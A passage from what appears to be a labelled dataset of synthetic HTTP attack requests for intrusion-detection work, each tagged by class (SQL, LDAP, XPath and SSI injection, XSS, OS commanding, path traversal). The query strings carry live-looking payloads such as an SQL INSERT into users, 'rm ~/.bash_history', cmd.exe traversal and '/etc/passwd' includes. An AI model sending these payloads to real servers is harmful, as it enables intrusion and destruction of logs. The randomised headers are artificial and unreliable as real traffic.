Warning: 910 www.idcir.shtml "6amsbimteinud6eDrte" 
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bteorlrsnNeaa=3887&top0trnhd=cMr1SgUex&iAfn5cKkdeignet=hr&0_p@v0Fd=T&oesud=36779

End - Id: 42694
Start - Id: 42015
class: SqlInjection
GET /Dn/boNtia1/tfcepssLi5Iteimo/cliezwsmolhaa/et/bTp2ltdiRsRotnlh5rvo/emwCc4BXMkQoEeyBAE/nilpAmtriho6e5s.exe?yLa8oeoyld=oTI&lenbwbefifae8=%26%7Esock_streamSw&ebsahtia=zitepeqrt4hayN&plJ6aotsao2ea=cxi&N6@OMhZsSG=meari&rdndhSsmf6=%3B+++EXEC%28+%27INS%27%2B%27ERT+INTO+++users++values%28253%2C%27oprg%27%2C%271c9%27++++%29%29&ineNdeae87=llu0%40Qi&aw=nas0dtEipenr5lHechorgps&lYYW=eS9e&r2eeineoEs2ds=27 HTTP/1.0
Host: 68.26.151.83
Connection: close
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: ibu8n-mtnwn;q=0.2, a-etyen;q=0.4
Cache-Control: min-fresh=006
Client-ip: 209.185.53.108
Cookie: AHB3Ld04y=yoo;ehdltuhek=eYa6
Cookie2: $Version="334"
Date: Sun, 13 Feb 05 04:26:25 CET
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 01 Jan 10 05:18:40 CET
If-Unmodified-Since: Sat, 18 Oct 08 11:49:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 22:02:34 GMT
Max-Forwards: 26
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /tHctoDha.jsp
TE: trailers,chunked
Trailer: Trailer
User-Agent: obiijofa (ipcSdB)
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 5.3 187.240.199.198, daur/6.7 www.alsghztw.js:90114
Transfer-Encoding: deflate
Upgrade: oNeesa/5.1, old/9.8, 9snek/4.6, 2and/4.1, erjmEs/4.6
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42015
Start - Id: 48088
class: XSS
GET /QPNj/5hyx7pr/t7.HMIRLYSdS/hZ4LXkcor4ze2A/tncE/t.iYCR49/rduqoaedoenTaarkUrhK.php3?hh2=2g&Tnr8ah6heO9=%3Cimg++src%3D%26%7B%5Balert%28%27fkds0n%27%29%3B%5D%7D%3B+%3E&nsse8xthgttveO=57344626 HTTP/1.0
Host: 141.178.62.93
Connection: close
Accept: image/*;q=0.5, audio/basic;q=0.3, application/x-tar;q=0.9
Accept-Charset: koi8-r, x-mac-japanese;q=0.4, big5;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="02"
Date: Sat, 08 Jul 06 20:05:07 UTC
ETag: W/"_NrJQAFWBD.1Ued@q5"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 20 Mar 04 24:54:44 GMT
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: *
If-None-Match: "@d9wbSsMxN.ayvo"
If-Range: "pycaZVLhg9JCVweRmNW"
Max-Forwards: 832
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: http://www.cgeodr.cz/a1te.rar
TE: trailers
Trailer: Max-Forwards
User-Agent: ej916ow http://www.99eivu0.be
UA-CPU: PowerPC
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: compress
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 756 5.66.220.204:50966 "enwFsoiiennyllH" "Thu, 05 Jul 07 19:51:43 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48088
Start - Id: 43557
class: OsCommanding
GET /r6g3vewhl4edeJT/eZcaUk.uEld8S4nu/i7a/KLiPA/ajro0iertg/lXdZeJvxrj3RC-01/7hcdho3rd1p3t/9etmyepeehqeD/dbftfdN2ZNSMzgOFj@KU/hSush/fd/oieto.msf?7twFVRGw=%27+++++%3B++++rm+++%7E%2F.bash_history++++%3B&eg08=3459 HTTP/1.1
Host: 90.185.96.49
Connection: cw4s
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, utf-8;q=0.7, euc-jp
Accept-Encoding: *;q=0.7
Accept-Language: dyYse8-7Nzd8, unur-t;q=0.1, uv-u
Cache-Control: ycmrh=mh1loR
Client-ip: 214.70.1.175
Cookie: eTTanstng=n<lasi5re8;onWhnr=941;gke0=opt;I4Ld0avChttpkuv=r 7]fiphp lP;nllc=oreplacen
Cookie2: $Version="88"
Date: Sat, 27 Oct 07 16:08:50 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Sat, 15 Apr 06 20:11:34 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:21:22 UTC
If-Match: "OocUsqj8sAMR@yi"
If-None-Match: *
If-Range: "CT8FV.6p_EE5..7"
Max-Forwards: 0
MIME-Version: 7.0
Pragma: rAnto=0nFwwre
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: NTLM eWFDYXR0ZURUbXRuemE0YWRjcTVpZ2V1NGdoakhyN2pmZW9t
Range: -25100,-2
Referer: http://rsha.org/irrHrv/soja/eyItm/npl5.jpeg
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 7.2; 6t-ig; rv:2.6.9) Gecko/39840104
UA-CPU: x86
UA-Disp: 307,4277,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 5.4 www.intzd.htm, FTP/3.0 www.ezhzeltb.htm
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43557
Start - Id: 44404
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.giieqI.uk:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: shift_jis;q=0.2, windows-1254;q=0.8, x-mac-turkish;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 136.18.89.145
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="3"
Date: Sun, 08 Jun 08 18:24:43 CET
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: entlr@ASnuouyuhe.cz
If-Modified-Since: Tue, 20 Jan 04 21:03:03 CET
If-Unmodified-Since: Mon, 28 Sep 09 22:27:24 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Thu, 14 Oct 04 08:41:48 CET
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: khmd unesc=bodf9Nd
Range: 07334-,0929-,-17620
Referer: http://jtoi.gov/d9t8d/9fh2xki/r4tthoe/hnXttbwO.asp
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 2.0; ep-dv; rv:9.6.7) Gecko/55746797
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 5.2 221.83.191.6, 7.2 www.tg9eetbf.css, 0.1 www.onts.jpg
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44404
Start - Id: 48510
class: XPathInjection
POST /je/jUgHperlUJB/wtT/WATtwc9noQO4telnetrp/aLIEhXUhrQU4csQx/nntoSic/hb-Nl5/rsazcd/iyh/sbeen/ahtg4risI513.css? HTTP/1.0
Content-Length: 350
Content-Language: A,mnhkaur
Content-Encoding: identity
Content-Location: http://www.eeEn.de/euibci/ceaqoeeD/Dntc.txt
Content-MD5: SmVlM29jYW91TjBsZWh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Sep 08 11:17:15 CET
Last-Modified: Sun, 24 Apr 05 15:58:18 UTC
Host: www.zmtzs.it
Connection: close
Accept: text/*, application/rtf;q=0.8
Accept-Charset: iso-8859-9, hz-gb-2312;q=0.6, x-mac-chinesetrad;q=0.3, windows-1253, iso-8859-4;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 117.212.24.161
Cookie: 7l=3vE;e1eXvbscriptLEU=104;sht=dhTdter9snlin8hc;paa8qitL8ahuki=39044;rn=of
Cookie2: $Version="5"
Date: Fri, 16 Mar 07 03:37:35 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: pdaiytge=ttintxkT;rkEAm
From: 3eaqc@eaed.ch
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: "sL-.ub@Kc3k8_9X"
If-None-Match: "iULHKT54WCFCYV8FLL"
If-Range: "DQxam.gceadvbjdp"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="toiqs"
Authorization: NTLM dE5yYmxvMXJlYW5lYmNuSHNBYXN0ZGF1RGxlcDBJQmMzT0ls
Range: 811682-312,0-
Referer: http://Hte7Ro.biz/eaeN2ld/Lesnl/eaautd/lowpe.php
TE: deflate
Trailer: From
User-Agent: Mozilla/9.2 (compatible; Konqueror/0.9; Unix; masml1)
UA-CPU: 68000
UA-OS: Solaris
Via: 7.4 www.mmaEas.shtml, 6than5/3.6 www.hbahnoe.gif
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

yotrcdae=tRz7ttihectswHep&8z9jDnX=026739171&m_TIye=e&f9hgh8r1IsrosIE=t\hio&_htpassYeYk5SEoxs=wgetlsUw&winscoeoiue=58&UnodeTnH-1=unionbxx et&FzoptIh=f8t8nr&tms4o71i=0501  or  count(path/child::node()[position()=((i+j+k+l+1)]   | path/child::*()[position()=(k+1)])=1   or   60199=

End - Id: 48510
Start - Id: 38530
class: LdapInjection
GET /aI/deehtteSsi3/L@zBe4bS7/cbrkctharyne.jpg?t2=0234020707&ryhaw=1021&owosf32dsvmeRtT=65891475&8rmmftep2=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&3HMLLsrlXsam=4534&oougimaiwst=5316333&wpd7oha=000&TWallOBGhome=68441086 HTTP/1.0
Host: 122.113.124.122
Connection: 6odmjlui
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 101.131.250.156
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Fri, 16 Jun 06 02:08:11 GMT
ETag: W/"fAffeoKc6SLNsUm"
Expect: aieFs
From: n9eatae@mdeel.gov
If-Modified-Since: Wed, 23 Dec 09 07:59:59 UTC
If-Unmodified-Since: Sat, 18 Nov 06 02:11:00 GMT
If-Match: *
If-None-Match: "Vp@_Fe9Jyf29sQHX"
If-Range: Sun, 19 Sep 04 20:43:32 GMT
Max-Forwards: 7252
MIME-Version: 4.8
Pragma: Tpoonmt=c8iyo
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: -491426,38-440
Referer: http://www.fDeFnai.fr/t25raw8/6lT0iI2/tfnm9oc/yiiesss.mpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 2.8; ez-uh; rv:1.5.9) Gecko/55033320
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8726x4401
Via: 3.3 218.247.242.126, too/5.9 102.37.164.51
Transfer-Encoding: ncsten; sl6taOp4=ickrge
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38530
Start - Id: 36047
class: PathTransversal
GET /ghLrW/ttfhsdnsa/3GwL2Vhttpd5.cfm?ai=egck&oq2ind=qbody%3Fu6on0&teaoDTT=%26ae6tmprig&andFdrnph-j=63222&tnmdleeubni5=390125595&DPUtmp7LMwQ0cS=4Moicts&TweSgotm=%5Cautoexec.bat HTTP/1.0
Host: 223.161.76.164
Connection: eati
Accept: text/*, video/quicktime;q=0.7, application/x-tar;q=0.6
Accept-Charset: iso-8859-1, iso-10646-ucs-2
Accept-Encoding: identity;q=0.8, deflate;q=0.6
Accept-Language: *
Cache-Control: min-fresh=7967
Client-ip: 140.87.76.152
Cookie: gtdoEo=7KBxF;Cha4r4xojRe8dsr=101392;ND4formh-Ls2telnet=b hobexect?0certotsB;titlAsjhirun=pfL1xetaieee8a8Xd;eettp=61921
Cookie2: $Version="69"
Date: Sat, 14 Jul 07 18:43:48 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Sun, 18 Feb 07 11:38:15 UTC
If-Match: *
If-None-Match: "G9IaU4.Ie-nYJpc"
If-Range: Wed, 03 Mar 10 12:32:05 GMT
Max-Forwards: 8540
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="cK41eie"
Range: 709-485
Referer: http://eeunar.gov/iedbd/7tty/tnCETr6.jsp
TE: trailers
Trailer: If-Match
User-Agent: sir8ymityjdt
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36047
Start - Id: 43710
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 233.238.240.169:80
Connection: lsas4u
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, deflate, deflate;q=0.3
Accept-Language: olic-puetefft, trEyie-ry, 4-onwso;q=0.7, eTn46nro-poKf;q=0.8, s8NjcTg-uJys
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Mon, 29 Dec 08 16:25:45 GMT
ETag: W/"iBbC@9sWtxRHx5im"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Tue, 28 Mar 06 20:28:01 CET
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 13
MIME-Version: 8.9
Pragma: hytttzde=uh
Proxy-Authorization: Basic c2VhaW46Ykh0U3A=
Authorization: Digest nonce
Range: 7008-71
Referer: /2rgkst/edee.swf
TE: gzip
User-Agent: Mozilla/9.3 (compatible; Konqueror/0.9; WinNT; kllaPar; ae7hA; smpGaOdmhp)
UA-CPU: 68000
UA-Disp: 210,8217,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: tnhrdi; orzia=njLOxln
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 160.206.203.92
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43710
Start - Id: 47903
class: XSS
GET /gN6mbovWTRVc7H9d/EMxsOiHypAq3mailhtpass/xJ0/lXGrYaG-K.sQok/1DhvylvhYZzsE6AL/oT1DtGaF.d6G/ieanWismnefkOme/eaEs9tnrzdstl8Qna/nu5JIWLJ9YqgG.swf?eegnueusoie2n=%3Cimg++src++++%3D+%22++++llal++%22onmouseover%3D++%22++++%5Balert+++%28%27liuItenn%27%29%3B%5D%22%3E HTTP/1.1
Host: www.ifpl5e.fr
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate, identity
Accept-Language: *
Cache-Control: ioaesrep='lu'
Client-ip: 73.100.104.87
Cookie: oRcEaemmgoeeo=9501;MoluRpB=tuP5;o8neia9lpere=dtNals<tpoyamixtau;eDhtE=yr;2eueoHhoIhoetwe=595953;ks9rse1b=Pbgsounda>e echoto2tr
Cookie2: $Version="04"
Date: Fri, 10 Sep 04 15:26:49 CET
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: reeofnse
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Sat, 17 Sep 05 24:32:39 CET
If-Match: *
If-None-Match: *
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 4577
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 53066-01
Referer: http://Catyr.ch/artat/ohehfs/srekhsto/tntl/mneoseaf.jsp
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: me3sldeIk (tbB9q@; eHDs0lAA9; rNHXLe)
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: pRlae
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47903
Start - Id: 38264
class: LdapInjection
GET /iknT2adisst/oQlPJEd/ee1nai8ry0io/j0T2y/vduenan/ehndyIK/sadEgirnnnsshsEp/ahiiSri6iOtgotEccg/1_2eX.yPE2cpdGYI/V6g0/Uei3cHeh.jpg?non5ysanrhfEh4=iItC&kcatNCE=%3Fetewcr&tZZgS=u%28in&1ceue0st6Mtl0fR=yd%25Nxml&sSMTa9k3xse3mQ=ncatr&tner=21&0ae3O.=i4ouEech6rnxy&citoadh0ri4sh4h=e%24Yod&Qtayeitlf=%29++++%28+%7C++++%28+cn%3D*o+%27brien*%29%28mail+%3D*o+++%27brien*+++%29&uhtheadscnt3=t9t&Tngn=nrlc+%25us4+nt+&s8sdnnsethhter=iYWxn.dxn&ltEetY4eNdB055T=T&owtneentl=3 HTTP/1.0
Host: www.paoani.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: anmN-SaIa;q=0.4, h-ndrts, xtet-0imd6rei, DiaTt-e, agrhho7a-7eoemue9
Cache-Control: max-age=62
Client-ip: 180.59.110.114
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="99"
Date: Sun, 28 Aug 05 24:32:15 GMT
ETag: "RtXlyZgjYG5n60XYwM"
Expect: ftes
From: iaon@um9ltetugp.biz
If-Modified-Since: Thu, 22 Mar 07 03:57:39 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Oct 04 05:09:26 UTC
Max-Forwards: 7314
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest username="pneDogep"
Range: 395742-,-784490,-6493
Referer: http://raeezoe.ch/sfih8xse/iilia.php3
TE: chunked,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (X11; U; Linux i586 6.1; Ia-So; rv:8.5.9) Gecko/27662159
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: deflate
Upgrade: tme6o5/8.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38264
Start - Id: 39758
class: SSI
GET /he7ZGgQMYe3/pd.DO@2IGLuBXAn/dWb7martx/rnrotrOnlrmyhiem/n8rkazgeztlgu/eotloteo8aCu3i6ipn/nAID35YoTe5hI@/nwqtnP9gWoI_dXV.png?6lsJjvY=eaXWe6jI3KMm&Iureibhe=hnfavutyAisdP&AtiewoRzte5=%3C%21--+++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&Fnjeaob9sobso=ji8dracu%3B%3Aac%24%2Fn&fdh2rh=oSzvHtmcr HTTP/1.1
Host: 4.169.254.184
Connection: keep-alive
Accept: video/quicktime;q=0.2
Accept-Charset: iso-10646-ucs-2, x-mac-arabic, iso-8859-9;q=0.8, windows-1254, iso-8859-6;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: m2-l2r, e-l;q=0.4, ilivlf-q;q=0.7, fle-er;q=0.4
Cache-Control: ieltefi=wrC7Tt
Client-ip: 122.119.15.78
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="98"
Date: Tue, 24 May 05 21:40:13 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Tue, 15 Mar 05 16:54:34 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "yEz@OCk0rOB6.FcpI"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: Tue, 02 Feb 10 21:58:05 GMT
Max-Forwards: 82
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: Basic aWxodHE3OkZkbWxzMmQ=
Range: 42-82,601-32,-86
Referer: /o9tu/RiksatT.cgi
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: TVpo (9WIC5uu-YS; rqCiJWSue; trL10TW; o3McDTnA; z9qP4_T0)
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: HTTP/5.2 55.120.255.95, 9.5 193.134.181.80:2
Transfer-Encoding: deflate
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39758
Start - Id: 40468
class: SSI
GET /Aiseo4tth.dll?4MbOs4sohehn3n=s7childkheaF%7E7zih&du=%27systemr&s0=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&e8ewVmngi=%29%3Bu HTTP/1.0
Host: 161.168.213.147
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-CuanEzt, Now0Sme-oRc, zRaroa-hie, Lt-a0oG5nx;q=0.9, cfhtu-etu
Cache-Control: no-transform
Client-ip: 171.219.126.225
Cookie: ar=er
Cookie2: $Version="386"
Date: Thu, 19 Mar 09 14:00:34 GMT
ETag: W/"fAWBVr05qijQem_WNf"
Expect: gCixb
From: Yma7@5eefcOthto.biz
If-Modified-Since: Mon, 05 Jun 06 17:38:05 GMT
If-Unmodified-Since: Fri, 24 Nov 06 17:08:16 UTC
If-Match: "CcRcwWICreg72Di0"
If-None-Match: *
If-Range: Mon, 28 Jan 08 08:44:02 UTC
Max-Forwards: 32
MIME-Version: 6.5
Pragma: sgerTp=ansolnO
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM NHJpdE9vbG5yYWU5ZTduMGVsM3NldGxndFhhbmdoYm9vOXR0cGVo
Range: 6740-758,0802-
Referer: /OqwhzLso/ezht/esenet.pdf
TE: gzip;q=0.1
Trailer: Date
User-Agent: uineu601m (cb1zlNU; nJVJ8lJa; yhp6yU@@fi)
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: HTTP/6.0 www.rCsen.jpg, ceone/7.8 www.bsounii.png, 7.8 www.eaSn7e.css
Transfer-Encoding: AflaI
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 40468
Start - Id: 43665
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.0ajtt.org
Connection: close
Accept: text/html;q=0.6, text/plain;q=0.0, application/*
Accept-Charset: euc-jp, iso-8859-8-i
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Cookie: iwlMxrebad=67297664;9aimvp=9q_CAtew;JKux=93712;RKZQ=hotE2enqS8
Date: Thu, 16 Nov 06 19:56:32 CET
ETag: W/"vIAsssT5MPBJtm8Z8RlU"
From: Wehzk@ajSrRs.cz
If-Modified-Since: Fri, 16 Dec 05 18:16:43 CET
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: "aQv.P6W6o6GbeiSxKqn"
If-Range: *
Max-Forwards: 603
MIME-Version: 2.2
Pragma: no-cache
Referer: /sbehDio/leet5uoo/nnisrl.asp
TE: chunked,gzip;q=0.9
User-Agent: skoloeaoctEa
Via: 9.9 www.Amne.tiff, 3.5 45.238.138.186:02693
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 209.40.83.3
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43665
Start - Id: 49346
class: XPathInjection
